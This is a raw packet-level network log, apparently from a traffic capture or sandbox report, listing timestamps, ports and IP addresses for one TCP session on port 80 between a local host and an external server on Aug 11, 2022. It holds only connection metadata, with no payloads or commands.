Aug 11, 2022 06:57:09.706413031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706428051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706450939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706464052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706490993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706526995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706542969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706563950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706597090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706621885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706664085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.717636108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.717693090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.717730999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.717747927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.717782021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.717787981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.721185923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721229076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721278906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721301079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.721323013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721334934 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.721394062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721430063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721456051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.721467972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721473932 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.721523046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.721700907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721741915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721777916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721782923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.721816063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721832037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.721856117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721892118 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721919060 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.721927881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.721929073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.721966982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722002029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722026110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722038984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722043991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722075939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722114086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722129107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722151995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722187996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722206116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722234011 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722235918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722275019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722299099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722310066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722320080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722347975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722362995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722384930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722398043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722420931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722459078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722475052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722496033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722532988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722548962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722572088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722579956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722614050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722631931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722652912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722666025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722692013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722728014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722749949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722762108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.722785950 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.722803116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737000942 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737061024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737121105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737144947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737153053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737175941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737230062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737232924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737242937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737274885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737307072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737312078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737334013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737366915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737375021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737407923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737413883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737417936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737452030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737476110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737489939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737505913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737524986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737562895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737580061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737601995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737639904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737656116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737679005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737685919 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737715960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737752914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737767935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737790108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737826109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737842083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737863064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737870932 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737900019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737937927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.737951994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.737977028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738034964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738076925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738085985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738097906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738116026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738151073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738152027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738174915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738188982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738220930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738226891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738256931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738274097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738277912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738331079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738334894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738374949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738405943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738413095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738423109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738461971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738477945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738497972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738507986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738535881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738549948 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738574982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738614082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738627911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738651991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738676071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738689899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738702059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738727093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738744020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738765001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738776922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738802910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738814116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738841057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738857985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738879919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738886118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738917112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738954067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.738965034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.738991022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.739026070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.739042997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.739063025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.739070892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.739099979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.739137888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.739154100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.739176035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.739186049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.739265919 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.741724968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.741767883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.741863012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.741892099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.742204905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.742243052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.742275953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.742280006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.742302895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.742319107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.742330074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.742372036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.744308949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.744348049 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.744385958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.744419098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.744458914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.744760036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.744796991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.744833946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.744858980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.744872093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.744875908 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.744908094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.744925976 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.744952917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.745290041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.745330095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.745345116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.745367050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.745383978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.745404005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.745407104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.745433092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.745461941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.745480061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.748501062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.748537064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.748568058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.748600960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.748621941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.748631001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.748672009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.748684883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.748986006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.749048948 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.750618935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750652075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750684023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750686884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.750706911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.750714064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750744104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750747919 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.750767946 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.750777006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750791073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.750808954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750833988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.750839949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750871897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750895977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.750902891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750925064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.750936031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750952959 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.750968933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.750999928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751023054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751032114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751040936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751064062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751077890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751095057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751126051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751147985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751157045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751167059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751188993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751207113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751221895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751235008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751252890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751285076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751306057 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751315117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751331091 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751419067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751449108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751477003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751480103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751502037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751511097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751534939 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751543045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751554012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751576900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751600981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751614094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751671076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751682997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751715899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751760960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751775980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751796007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751808882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751828909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751852989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751859903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751880884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751892090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751923084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751946926 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751952887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751969099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.751985073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.751996994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752016068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752042055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752048969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752060890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752082109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752098083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752111912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752142906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752166986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752175093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752192020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752206087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752217054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752237082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752259970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752268076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752279997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752300024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752332926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752350092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752362013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.752382994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.752407074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.968697071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.024406910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.024472952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.024518013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.024557114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.024627924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.026207924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.026263952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.026313066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.026314020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.026344061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.026371002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.026402950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.026458979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.041384935 CEST	80	49736	89.208.103.4	192.168.2.3
